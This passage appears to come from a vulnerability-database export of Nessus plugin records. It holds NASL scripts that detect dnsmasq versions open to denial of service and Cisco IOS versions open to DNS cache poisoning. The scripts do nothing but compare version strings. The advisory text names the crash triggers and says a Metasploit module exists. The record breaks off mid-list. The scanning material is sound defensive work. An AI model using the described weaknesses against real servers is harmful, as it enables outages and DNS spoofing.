This version reportedly is affected by 3 denial of service\nissues :\n\n - The application can crash when an unknown client\n attempts to renew a DHCP lease.\n\n - The application may crash when a host which doesn't\n have a lease does a 'DHCPINFORM'.\n\n - There is a crash vulnerability in the netlink code.", "edition": 26, "cvss3": {"score": 5.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"}, "published": "2008-09-08T00:00:00", "title": "dnsmasq < 2.45 Multiple Remote DoS", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3350"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:thekelleys:dnsmasq"], "id": "DNSMASQ_MULTIPLE_DOS.NASL", "href": "https://www.tenable.com/plugins/nessus/34111", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(34111);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/07/10 14:27:31\");\n\n script_cve_id(\"CVE-2008-3350\");\n script_bugtraq_id(31017);\n\n script_name(english:\"dnsmasq < 2.45 Multiple Remote DoS\");\n script_summary(english:\"Checks the version of dnsmasq\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote DNS / DHCP service is affected by multiple denial of\nservice vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running dnsmasq, a DHCP and DNS server.\n\nThe version of dnsmasq installed on the remote host reports itself as\n2.43. 
This version reportedly is affected by 3 denial of service\nissues :\n\n - The application can crash when an unknown client\n attempts to renew a DHCP lease.\n\n - The application may crash when a host which doesn't\n have a lease does a 'DHCPINFORM'.\n\n - There is a crash vulnerability in the netlink code.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.thekelleys.org.uk/dnsmasq/CHANGELOG\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e8cca54d\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5db6c7d4\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to dnsmasq 2.45 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/09/08\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:thekelleys:dnsmasq\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n script_family(english:\"DNS\");\n\n script_dependencie(\"dns_version.nasl\");\n script_require_keys(\"dns_server/version\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/dns\", 53);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"global_settings.inc\");\n\napp_name = \"dnsmasq\";\n\nport = 
get_kb_item(\"Services/udp/dns\");\nif (!port) port = 53;\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# dnsmasq replies to BIND.VERSION\nversion = get_kb_item_or_exit(\"dns_server/version\");\nversion = tolower(version);\ndisplay_version = version;\n\nif (version !~ \"dnsmasq-(v)?\")\n audit(AUDIT_NOT_LISTEN, app_name, port);\n\nversion = ereg_replace(pattern:\"^dnsmasq-(v)?(.*)$\", replace:\"\\2\", string:version);\n\nif (version == '2')\n audit(AUDIT_VER_NOT_GRANULAR, app_name, port, display_version);\n\nif (version =~ \"^(2\\.43([^0-9]|$))$\")\n{\n report = '\\n' +\n '\\n Installed version : ' + display_version +\n '\\n Fixed version : dnsmasq-2.45' +\n '\\n';\n security_report_v4(port:53, proto:\"udp\", severity:SECURITY_WARNING, extra:report);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, app_name, port, display_version, 'udp');\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-03-17T22:54:02", "description": "Multiple Cisco products are vulnerable to DNS cache poisoning attacks\ndue to their use of insufficiently randomized DNS transaction IDs and\nUDP source ports in the DNS queries that they produce, which may allow\nan attacker to more easily forge DNS answers that can poison DNS\ncaches.\nTo exploit this vulnerability an attacker must be able to cause a\nvulnerable DNS server to perform recursive DNS queries. 
Therefore, DNS\nservers that are only authoritative, or servers where recursion is not\nallowed, are not affected.\nCisco has released free software updates that address these\nvulnerabilities.\n", "edition": 11, "published": "2010-09-01T00:00:00", "title": "Multiple Cisco Products Vulnerable to DNS Cache Poisoning Attacks", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2010-09-01T00:00:00", "cpe": ["cpe:/o:cisco:ios"], "id": "CISCO-SA-20080708-DNSHTTP.NASL", "href": "https://www.tenable.com/plugins/nessus/49017", "sourceData": "#TRUSTED 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\n#\n# (C) Tenable Network Security, Inc.\n#\n# Security advisory is (C) CISCO, Inc.\n# See https://www.cisco.com/en/US/products/products_security_advisory09186a00809c2168.shtml\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(49017);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2018/11/15\");\n script_cve_id(\"CVE-2008-1447\");\n script_bugtraq_id(30131);\n script_xref(name:\"CERT\", value:\"800113\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCso81854\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCsq01298\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCsq21930\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCsr28008\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCsr28354\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCsr29124\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCsr29691\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCsr61220\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCsr98689\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCsu10546\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20080708-dns\");\n script_name(english:\"Multiple Cisco Products Vulnerable to DNS Cache Poisoning Attacks\");\n script_summary(english:\"Checks 
the IOS version.\");\n script_set_attribute(attribute:\"synopsis\", value:\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n'Multiple Cisco products are vulnerable to DNS cache poisoning attacks\ndue to their use of insufficiently randomized DNS transaction IDs and\nUDP source ports in the DNS queries that they produce, which may allow\nan attacker to more easily forge DNS answers that can poison DNS\ncaches.\nTo exploit this vulnerability an attacker must be able to cause a\nvulnerable DNS server to perform recursive DNS queries. Therefore, DNS\nservers that are only authoritative, or servers where recursion is not\nallowed, are not affected.\nCisco has released free software updates that address these\nvulnerabilities.\n');\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2e77e5a8\");\n # https://www.cisco.com/en/US/products/products_security_advisory09186a00809c2168.shtml\n script_set_attribute(attribute:\"see_also\", value: \"http://www.nessus.org/u?428cc712\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patch referenced in Cisco Security Advisory\ncisco-sa-20080708-dns.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'DNS BailiWicked Host Attack');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:ios\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2008/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/09/01\");\n\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is (C) 2010-2018 Tenable Network Security, Inc.\");\n script_family(english:\"CISCO\");\n script_dependencie(\"cisco_ios_version.nasl\");\n script_require_keys(\"Host/Cisco/IOS/Version\");\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_func.inc\");\ninclude(\"cisco_kb_cmd_func.inc\");\n\nflag = 0;\noverride = 0;\nversion = get_kb_item_or_exit(\"Host/Cisco/IOS/Version\");\n\nif (version == '12.4(15)XZ') flag++;\nelse if (version == '12.4(15)XY2') flag++;\nelse if (version == '12.4(15)XY1') flag++;\nelse if (version == '12.4(15)XY') flag++;\nelse if (version == '12.4(11)XW7') flag++;\nelse if (version == '12.4(11)XW6') flag++;\nelse if (version == '12.4(11)XW5') flag++;\nelse if (version == '12.4(11)XW4') flag++;\nelse if (version == '12.4(11)XW3') flag++;\nelse if (version == '12.4(11)XW2') flag++;\nelse if (version == '12.4(11)XW1') flag++;\nelse if (version == '12.4(11)XW') flag++;\nelse if (version == '12.4(11)XV1') flag++;\nelse if (version == '12.4(11)XV') flag++;\nelse if (version == '12.4(6)XT2') flag++;\nelse if (version == '12.4(6)XT1') flag++;\nelse if (version == '12.4(6)XT') flag++;\nelse if (version == '12.4(15)XQ') flag++;\nelse if (version == '12.4(15)XN') flag++;\nelse if (version == '12.4(15)XM') flag++;\nelse if (version == '12.4(15)XL1') flag++;\nelse if (version == '12.4(15)XL') flag++;\nelse if (version == '12.4(11)XJ4') flag++;\nelse if (version == '12.4(11)XJ3') flag++;\nelse if (version == '12.4(11)XJ2') flag++;\nelse if (version == '12.4(11)XJ') flag++;\nelse if (version == '12.4(6)XE3') flag++;\nelse if (version == '12.4(6)XE2') flag++;\nelse if (version == '12.4(6)XE1') flag++;\nelse if (version == '12.4(6)XE') flag++;\nelse if (version == '12.4(4)XD9') 
flag++;\nelse if (version == '12.4(4)XD8') flag++;\nelse if (version == '12.4(4)XD7') flag++;\nelse if (version == '12.4(4)XD5') flag++;\nelse if (version == '12.4(4)XD4') flag++;\nelse if (version == '12.4(4)XD2') flag++;\nelse if (version == '12.4(4)XD10') flag++;\nelse if (version == '12.4(4)XD1') flag++;\nelse if (version == '12.4(4)XD') flag++;\nelse if (version == '12.4(4)XC7') flag++;\nelse if (version == '12.4(4)XC6') flag++;\nelse if (version == '12.4(4)XC5') flag++;\nelse if (version == '12.4(4)XC4') flag++;\nelse if (version == '12.4(4)XC3') flag++;\nelse if (version == '12.4(4)XC2') flag++;\nelse if (version == '12.4(4)XC1') flag++;\nelse if (version == '12.4(4)XC') flag++;\nelse if (version == '12.4(2)XB6') flag++;\nelse if (version == '12.4(2)XA2') flag++;\nelse if (version == '12.4(2)XA1') flag++;\nelse if (version == '12.4(2)XA') flag++;\nelse if (version == '12.4(15)T5') flag++;\nelse if (version == '12.4(15)T4') flag++;\nelse if (version == '12.4(15)T3') flag++;\nelse if (version == '12.4(15)T2') flag++;\nelse if (version == '12.4(15)T1') flag++;\nelse if (version == '12.4(15)T') flag++;\nelse if (version == '12.4(11)T4') flag++;\nelse if (version == '12.4(11)T3') flag++;\nelse if (version == '12.4(11)T2') flag++;\nelse if (version == '12.4(11)T1') flag++;\nelse if (version == '12.4(11)T') flag++;\nelse if (version == '12.4(9)T7') flag++;\nelse if (version == '12.4(9)T6') flag++;\nelse if (version == '12.4(9)T5') flag++;\nelse if (version == '12.4(9)T4') flag++;\nelse if (version == '12.4(9)T3') flag++;\nelse if (version == '12.4(9)T2') flag++;\nelse if (version == '12.4(9)T1') flag++;\nelse if (version == '12.4(9)T') flag++;\nelse if (version == '12.4(6)T9') flag++;\nelse if (version == '12.4(6)T8') flag++;\nelse if (version == '12.4(6)T7') flag++;\nelse if (version == '12.4(6)T6') flag++;\nelse if (version == '12.4(6)T5') flag++;\nelse if (version == '12.4(6)T4') flag++;\nelse if (version == '12.4(6)T3') flag++;\nelse if (version == '12.4(6)T2') 
flag++;\nelse if (version == '12.4(6)T11') flag++;\nelse if (version == '12.4(6)T10') flag++;\nelse if (version == '12.4(6)T1') flag++;\nelse if (version == '12.4(6)T') flag++;\nelse if (version == '12.4(4)T8') flag++;\nelse if (version == '12.4(4)T7') flag++;\nelse if (version == '12.4(4)T6') flag++;\nelse if (version == '12.4(4)T5') flag++;\nelse if (version == '12.4(4)T4') flag++;\nelse if (version == '12.4(4)T3') flag++;\nelse if (version == '12.4(4)T2') flag++;\nelse if (version == '12.4(4)T1') flag++;\nelse if (version == '12.4(4)T') flag++;\nelse if (version == '12.4(2)T6') flag++;\nelse if (version == '12.4(2)T5') flag++;\nelse if (version == '12.4(2)T4') flag++;\nelse if (version == '12.4(2)T3') flag++;\nelse if (version == '12.4(2)T2') flag++;\nelse if (version == '12.4(2)T1') flag++;\nelse if (version == '12.4(2)T') flag++;\nelse if (version == '12.4(15)SW1') flag++;\nelse if (version == '12.4(15)SW') flag++;\nelse if (version == '12.4(11)SW3') flag++;\nelse if (version == '12.4(11)SW2') flag++;\nelse if (version == '12.4(11)SW1') flag++;\nelse if (version == '12.4(11)SW') flag++;\nelse if (version == '12.4(16)MR2') flag++;\nelse if (version == '12.4(16)MR1') flag++;\nelse if (version == '12.4(16)MR') flag++;\nelse if (version == '12.4(12)MR2') flag++;\nelse if (version == '12.4(11)MD4') flag++;\nelse if (version == '12.4(11)MD3') flag++;\nelse if (version == '12.4(11)MD2') flag++;\nelse if (version == '12.4(11)MD1') flag++;\nelse if (version == '12.4(11)MD') flag++;\nelse if (version == '12.4(19)') flag++;\nelse if (version == '12.4(18a)') flag++;\nelse if (version == '12.4(18)') flag++;\nelse if (version == '12.4(17b)') flag++;\nelse if (version == '12.4(17a)') flag++;\nelse if (version == '12.4(17)') flag++;\nelse if (version == '12.4(16b)') flag++;\nelse if (version == '12.4(16a)') flag++;\nelse if (version == '12.4(16)') flag++;\nelse if (version == '12.4(13f)') flag++;\nelse if (version == '12.4(13e)') flag++;\nelse if (version == '12.4(13d)') 
flag++;\nelse if (version == '12.4(13c)') flag++;\nelse if (version == '12.4(13b)') flag++;\nelse if (version == '12.4(13a)') flag++;\nelse if (version == '12.4(13)') flag++;\nelse if (version == '12.4(12c)') flag++;\nelse if (version == '12.4(12b)') flag++;\nelse if (version == '12.4(12a)') flag++;\nelse if (version == '12.4(12)') flag++;\nelse if (version == '12.4(10c)') flag++;\nelse if (version == '12.4(10b)') flag++;\nelse if (version == '12.4(10a)') flag++;\nelse if (version == '12.4(10)') flag++;\nelse if (version == '12.4(8d)') flag++;\nelse if (version == '12.4(8c)') flag++;\nelse if (version == '12.4(8b)') flag++;\nelse if (version == '12.4(8a)') flag++;\nelse if (version == '12.4(8)') flag++;\nelse if (version == '12.4(7h)') flag++;\nelse if (version == '12.4(7g)') flag++;\nelse if (version == '12.4(7f)') flag++;\nelse if (version == '12.4(7e)') flag++;\nelse if (version == '12.4(7d)') flag++;\nelse if (version == '12.4(7c)') flag++;\nelse if (version == '12.4(7b)') flag++;\nelse if (version == '12.4(7a)') flag++;\nelse if (version == '12.4(7)') flag++;\nelse if (version == '12.4(5c)') flag++;\nelse if (version == '12.4(5b)') flag++;\nelse if (version == '12.4(5a)') flag++;\nelse if (version == '12.4(5)') flag++;\nelse if (version == '12.4(3j)') flag++;\nelse if (version == '12.4(3i)') flag++;\nelse if (version == '12.4(3h)') flag++;\nelse if (version == '12.4(3g)') flag++;\nelse if (version == '12.4(3f)') flag++;\nelse if (version == '12.4(3e)') flag++;\nelse if (version == '12.4(3d)') flag++;\nelse if (version == '12.4(3c)') flag++;\nelse if (version == '12.4(3b)') flag++;\nelse if (version == '12.4(3a)') flag++;\nelse if (version == '12.4(3)') flag++;\nelse if (version == '12.4(1c)') flag++;\nelse if (version == '12.4(1b)') flag++;\nelse if (version == '12.4(1a)') flag++;\nelse if (version == '12.4(1)') flag++;\nelse if (version == '12.3(8)ZA') flag++;\nelse if (version == '12.3(11)YZ2') flag++;\nelse if (version == '12.3(11)YZ1') flag++;\nelse if 
(version == '12.3(11)YZ') flag++;\nelse if (version == '12.3(14)YX9') flag++;\nelse if (version == '12.3(14)YX8') flag++;\nelse if (version == '12.3(14)YX7') flag++;\nelse if (version == '12.3(14)YX4') flag++;\nelse if (version == '12.3(14)YX3') flag++;\nelse if (version == '12.3(14)YX2') flag++;\nelse if (version == '12.3(14)YX11') flag++;\nelse if (version == '12.3(14)YX10') flag++;\nelse if (version == '12.3(14)YX1') flag++;\nelse if (version == '12.3(14)YX') flag++;\nelse if (version == '12.3(14)YU1') flag++;\nelse if (version == '12.3(14)YT1') flag++;\nelse if (version == '12.3(14)YT') flag++;\nelse if (version == '12.3(11)YS2') flag++;\nelse if (version == '12.3(11)YS1') flag++;\nelse if (version == '12.3(11)YS') flag++;\nelse if (version == '12.3(11)YK3') flag++;\nelse if (version == '12.3(11)YK2') flag++;\nelse if (version == '12.3(11)YK1') flag++;\nelse if (version == '12.3(11)YK') flag++;\nelse if (version == '12.3(8)YI3') flag++;\nelse if (version == '12.3(8)YI2') flag++;\nelse if (version == '12.3(8)YI1') flag++;\nelse if (version == '12.3(8)YH') flag++;\nelse if (version == '12.3(8)YG6') flag++;\nelse if (version == '12.3(8)YG5') flag++;\nelse if (version == '12.3(8)YG4') flag++;\nelse if (version == '12.3(8)YG3') flag++;\nelse if (version == '12.3(8)YG2') flag++;\nelse if (version == '12.3(8)YG1') flag++;\nelse if (version == '12.3(8)YG') flag++;\nelse if (version == '12.3(11)YF4') flag++;\nelse if (version == '12.3(11)YF3') flag++;\nelse if (version == '12.3(11)YF1') flag++;\nelse if (version == '12.3(11)YF') flag++;\nelse if (version == '12.3(8)YD1') flag++;\nelse if (version == '12.3(8)YD') flag++;\nelse if (version == '12.3(8)YA1') flag++;\nelse if (version == '12.3(8)YA') flag++;\nelse if (version == '12.3(2)XZ2') flag++;\nelse if (version == '12.3(8)XX2d') flag++;\nelse if (version == '12.3(8)XX1') flag++;\nelse if (version == '12.3(8)XX') flag++;\nelse if (version == '12.3(8)XW3') flag++;\nelse if (version == '12.3(8)XW2') flag++;\nelse if 
(version == '12.3(8)XW1') flag++;\nelse if (version == '12.3(8)XW') flag++;\nelse if (version == '12.3(7)XS2') flag++;\nelse if (version == '12.3(7)XS1') flag++;\nelse if (version == '12.3(7)XS') flag++;\nelse if (version == '12.3(7)XR7') flag++;\nelse if (version == '12.3(7)XR6') flag++;\nelse if (version == '12.3(7)XR5') flag++;\nelse if (version == '12.3(7)XR4') flag++;\nelse if (version == '12.3(7)XR3') flag++;\nelse if (version == '12.3(7)XR2') flag++;\nelse if (version == '12.3(7)XR') flag++;\nelse if (version == '12.3(4)XQ1') flag++;\nelse if (version == '12.3(4)XQ') flag++;\nelse if (version == '12.3(11)XL1') flag++;\nelse if (version == '12.3(11)XL') flag++;\nelse if (version == '12.3(4)XK4') flag++;\nelse if (version == '12.3(4)XK3') flag++;\nelse if (version == '12.3(4)XK2') flag++;\nelse if (version == '12.3(4)XK1') flag++;\nelse if (version == '12.3(4)XK') flag++;\nelse if (version == '12.3(7)XJ2') flag++;\nelse if (version == '12.3(7)XJ1') flag++;\nelse if (version == '12.3(7)XJ') flag++;\nelse if (version == '12.3(7)XI8') flag++;\nelse if (version == '12.3(7)XI7b') flag++;\nelse if (version == '12.3(7)XI7a') flag++;\nelse if (version == '12.3(7)XI7') flag++;\nelse if (version == '12.3(7)XI6') flag++;\nelse if (version == '12.3(7)XI5') flag++;\nelse if (version == '12.3(7)XI4') flag++;\nelse if (version == '12.3(7)XI3') flag++;\nelse if (version == '12.3(7)XI2') flag++;\nelse if (version == '12.3(7)XI10a') flag++;\nelse if (version == '12.3(7)XI1') flag++;\nelse if (version == '12.3(4)XG5') flag++;\nelse if (version == '12.3(4)XG4') flag++;\nelse if (version == '12.3(4)XG3') flag++;\nelse if (version == '12.3(4)XG2') flag++;\nelse if (version == '12.3(4)XG1') flag++;\nelse if (version == '12.3(4)XG') flag++;\nelse if (version == '12.3(2)XF') flag++;\nelse if (version == '12.3(2)XE5') flag++;\nelse if (version == '12.3(2)XE4') flag++;\nelse if (version == '12.3(2)XE3') flag++;\nelse if (version == '12.3(2)XE2') flag++;\nelse if (version == 
'12.3(2)XE1') flag++;\nelse if (version == '12.3(2)XE') flag++;\nelse if (version == '12.3(4)XD4') flag++;\nelse if (version == '12.3(4)XD3') flag++;\nelse if (version == '12.3(4)XD2') flag++;\nelse if (version == '12.3(4)XD1') flag++;\nelse if (version == '12.3(4)XD') flag++;\nelse if (version == '12.3(2)XC5') flag++;\nelse if (version == '12.3(2)XC4') flag++;\nelse if (version == '12.3(2)XC3') flag++;\nelse if (version == '12.3(2)XC2') flag++;\nelse if (version == '12.3(2)XC1') flag++;\nelse if (version == '12.3(2)XC') flag++;\nelse if (version == '12.3(2)XB3') flag++;\nelse if (version == '12.3(2)XB1') flag++;\nelse if (version == '12.3(2)XB') flag++;\nelse if (version == '12.3(2)XA7') flag++;\nelse if (version == '12.3(2)XA6') flag++;\nelse if (version == '12.3(2)XA5') flag++;\nelse if (version == '12.3(2)XA4') flag++;\nelse if (version == '12.3(2)XA3') flag++;\nelse if (version == '12.3(2)XA1') flag++;\nelse if (version == '12.3(2)XA') flag++;\nelse if (version == '12.3(4)TPC11b') flag++;\nelse if (version == '12.3(4)TPC11a') flag++;\nelse if (version == '12.3(14)T7') flag++;\nelse if (version == '12.3(14)T6') flag++;\nelse if (version == '12.3(14)T5') flag++;\nelse if (version == '12.3(14)T3') flag++;\nelse if (version == '12.3(14)T2') flag++;\nelse if (version == '12.3(14)T1') flag++;\nelse if (version == '12.3(14)T') flag++;\nelse if (version == '12.3(11)T9') flag++;\nelse if (version == '12.3(11)T8') flag++;\nelse if (version == '12.3(11)T7') flag++;\nelse if (version == '12.3(11)T6') flag++;\nelse if (version == '12.3(11)T5') flag++;\nelse if (version == '12.3(11)T4') flag++;\nelse if (version == '12.3(11)T3') flag++;\nelse if (version == '12.3(11)T2') flag++;\nelse if (version == '12.3(11)T11') flag++;\nelse if (version == '12.3(11)T10') flag++;\nelse if (version == '12.3(11)T') flag++;\nelse if (version == '12.3(8)T9') flag++;\nelse if (version == '12.3(8)T8') flag++;\nelse if (version == '12.3(8)T7') flag++;\nelse if (version == '12.3(8)T6') 
flag++;\nelse if (version == '12.3(8)T5') flag++;\nelse if (version == '12.3(8)T4') flag++;\nelse if (version == '12.3(8)T3') flag++;\nelse if (version == '12.3(8)T11') flag++;\nelse if (version == '12.3(8)T10') flag++;\nelse if (version == '12.3(8)T1') flag++;\nelse if (version == '12.3(8)T') flag++;\nelse if (version == '12.3(7)T9') flag++;\nelse if (version == '12.3(7)T8') flag++;\nelse if (version == '12.3(7)T7') flag++;\nelse if (version == '12.3(7)T6') flag++;\nelse if (version == '12.3(7)T4') flag++;\nelse if (version == '12.3(7)T3') flag++;\nelse if (version == '12.3(7)T2') flag++;\nelse if (version == '12.3(7)T12') flag++;\nelse if (version == '12.3(7)T11') flag++;\nelse if (version == '12.3(7)T10') flag++;\nelse if (version == '12.3(7)T1') flag++;\nelse if (version == '12.3(7)T') flag++;\nelse if (version == '12.3(4)T9') flag++;\nelse if (version == '12.3(4)T8') flag++;\nelse if (version == '12.3(4)T7') flag++;\nelse if (version == '12.3(4)T6') flag++;\nelse if (version == '12.3(4)T4') flag++;\nelse if (version == '12.3(4)T3') flag++;\nelse if (version == '12.3(4)T2a') flag++;\nelse if (version == '12.3(4)T2') flag++;\nelse if (version == '12.3(4)T11') flag++;\nelse if (version == '12.3(4)T10') flag++;\nelse if (version == '12.3(4)T1') flag++;\nelse if (version == '12.3(4)T') flag++;\nelse if (version == '12.3(2)T9') flag++;\nelse if (version == '12.3(2)T8') flag++;\nelse if (version == '12.3(2)T7') flag++;\nelse if (version == '12.3(2)T6') flag++;\nelse if (version == '12.3(2)T5') flag++;\nelse if (version == '12.3(2)T4') flag++;\nelse if (version == '12.3(2)T3') flag++;\nelse if (version == '12.3(2)T2') flag++;\nelse if (version == '12.3(2)T1') flag++;\nelse if (version == '12.3(2)T') flag++;\nelse if (version == '12.3(1a)BW') flag++;\nelse if (version == '12.3(5a)B5') flag++;\nelse if (version == '12.3(5a)B4') flag++;\nelse if (version == '12.3(5a)B3') flag++;\nelse if (version == '12.3(5a)B2') flag++;\nelse if (version == '12.3(5a)B1') flag++;\nelse 
if (version == '12.3(5a)B') flag++;\nelse if (version == '12.3(3)B1') flag++;\nelse if (version == '12.3(3)B') flag++;\nelse if (version == '12.3(1a)B') flag++;\nelse if (version == '12.3(26)') flag++;\nelse if (version == '12.3(25)') flag++;\nelse if (version == '12.3(24a)') flag++;\nelse if (version == '12.3(24)') flag++;\nelse if (version == '12.3(23)') flag++;\nelse if (version == '12.3(22a)') flag++;\nelse if (version == '12.3(22)') flag++;\nelse if (version == '12.3(21b)') flag++;\nelse if (version == '12.3(21)') flag++;\nelse if (version == '12.3(20a)') flag++;\nelse if (version == '12.3(20)') flag++;\nelse if (version == '12.3(19a)') flag++;\nelse if (version == '12.3(19)') flag++;\nelse if (version == '12.3(18a)') flag++;\nelse if (version == '12.3(18)') flag++;\nelse if (version == '12.3(17c)') flag++;\nelse if (version == '12.3(17b)') flag++;\nelse if (version == '12.3(17a)') flag++;\nelse if (version == '12.3(17)') flag++;\nelse if (version == '12.3(16a)') flag++;\nelse if (version == '12.3(16)') flag++;\nelse if (version == '12.3(15b)') flag++;\nelse if (version == '12.3(15a)') flag++;\nelse if (version == '12.3(15)') flag++;\nelse if (version == '12.3(13b)') flag++;\nelse if (version == '12.3(13a)') flag++;\nelse if (version == '12.3(13)') flag++;\nelse if (version == '12.3(12e)') flag++;\nelse if (version == '12.3(12d)') flag++;\nelse if (version == '12.3(12c)') flag++;\nelse if (version == '12.3(12b)') flag++;\nelse if (version == '12.3(12a)') flag++;\nelse if (version == '12.3(12)') flag++;\nelse if (version == '12.3(10f)') flag++;\nelse if (version == '12.3(10e)') flag++;\nelse if (version == '12.3(10d)') flag++;\nelse if (version == '12.3(10c)') flag++;\nelse if (version == '12.3(10b)') flag++;\nelse if (version == '12.3(10a)') flag++;\nelse if (version == '12.3(10)') flag++;\nelse if (version == '12.3(9e)') flag++;\nelse if (version == '12.3(9d)') flag++;\nelse if (version == '12.3(9c)') flag++;\nelse if (version == '12.3(9b)') flag++;\nelse if 
(version == '12.3(9a)') flag++;\nelse if (version == '12.3(9)') flag++;\nelse if (version == '12.3(6f)') flag++;\nelse if (version == '12.3(6e)') flag++;\nelse if (version == '12.3(6c)') flag++;\nelse if (version == '12.3(6b)') flag++;\nelse if (version == '12.3(6a)') flag++;\nelse if (version == '12.3(6)') flag++;\nelse if (version == '12.3(5f)') flag++;\nelse if (version == '12.3(5e)') flag++;\nelse if (version == '12.3(5d)') flag++;\nelse if (version == '12.3(5c)') flag++;\nelse if (version == '12.3(5b)') flag++;\nelse if (version == '12.3(5a)') flag++;\nelse if (version == '12.3(5)') flag++;\nelse if (version == '12.3(3i)') flag++;\nelse if (version == '12.3(3h)') flag++;\nelse if (version == '12.3(3g)') flag++;\nelse if (version == '12.3(3f)') flag++;\nelse if (version == '12.3(3e)') flag++;\nelse if (version == '12.3(3c)') flag++;\nelse if (version == '12.3(3b)') flag++;\nelse if (version == '12.3(3a)') flag++;\nelse if (version == '12.3(3)') flag++;\nelse if (version == '12.3(1a)') flag++;\nelse if (version == '12.3(1)') flag++;\nelse if (version == '12.2(15)ZL1') flag++;\nelse if (version == '12.2(15)ZL') flag++;\nelse if (version == '12.2(15)ZJ5') flag++;\nelse if (version == '12.2(15)ZJ3') flag++;\nelse if (version == '12.2(15)ZJ2') flag++;\nelse if (version == '12.2(15)ZJ1') flag++;\nelse if (version == '12.2(15)ZJ') flag++;\nelse if (version == '12.2(13)ZH9') flag++;\nelse if (version == '12.2(13)ZH8') flag++;\nelse if (version == '12.2(13)ZH7') flag++;\nelse if (version == '12.2(13)ZH6') flag++;\nelse if (version == '12.2(13)ZH5') flag++;\nelse if (version == '12.2(13)ZH4') flag++;\nelse if (version == '12.2(13)ZH3') flag++;\nelse if (version == '12.2(13)ZH2') flag++;\nelse if (version == '12.2(13)ZH11') flag++;\nelse if (version == '12.2(13)ZH10') flag++;\nelse if (version == '12.2(13)ZH1') flag++;\nelse if (version == '12.2(13)ZH') flag++;\nelse if (version == '12.2(13)ZG') flag++;\nelse if (version == '12.2(13)ZF2') flag++;\nelse if (version == 
